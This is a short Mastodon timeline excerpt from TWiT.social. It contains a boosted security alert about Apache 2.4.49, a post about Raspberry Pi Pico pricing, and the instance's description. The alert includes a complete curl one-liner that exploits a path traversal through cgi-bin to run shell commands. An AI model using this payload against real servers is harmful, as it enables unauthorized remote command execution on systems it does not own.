andrej boosted

Apache 2.4.49 has a huge security problem: curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

RPi Pico are being sold by MicroCenter for 2$ each (first 5) and then up to normal 4$

In-Store only from what I'm seeing, mine had 30+ stock

TWiT.social

A Mastodon instance dedicated to TWiT listeners. Think of a Twitter just for geeks, sharing content with other Mastodon servers all over the world. If you're a TWiT fan, consider this your home! Our TWiT Forums live at TWiT Community. Post conversation starters there. TWiT.social is for quick thoughts, fun pictures, and other ephemera. Keep it clean, keep it friendly. Looking forward to your Toots!